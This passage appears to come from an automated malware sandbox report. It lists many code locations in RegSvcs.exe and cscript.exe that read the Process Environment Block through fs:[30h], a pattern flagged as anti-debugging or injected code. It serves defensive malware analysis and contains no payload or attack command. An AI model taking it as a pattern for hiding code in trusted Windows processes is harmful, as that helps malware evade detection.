            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01674257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01624A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01624A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01603A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01623D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01663540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01607D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0166A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01698DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016135A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01611DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01611DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01611DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016237F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01618E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016116E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01628EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016136CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016646A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04863884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04863884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048290AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04800050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04800050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487C450 mov eax, dword ptr fs:[00000030h]
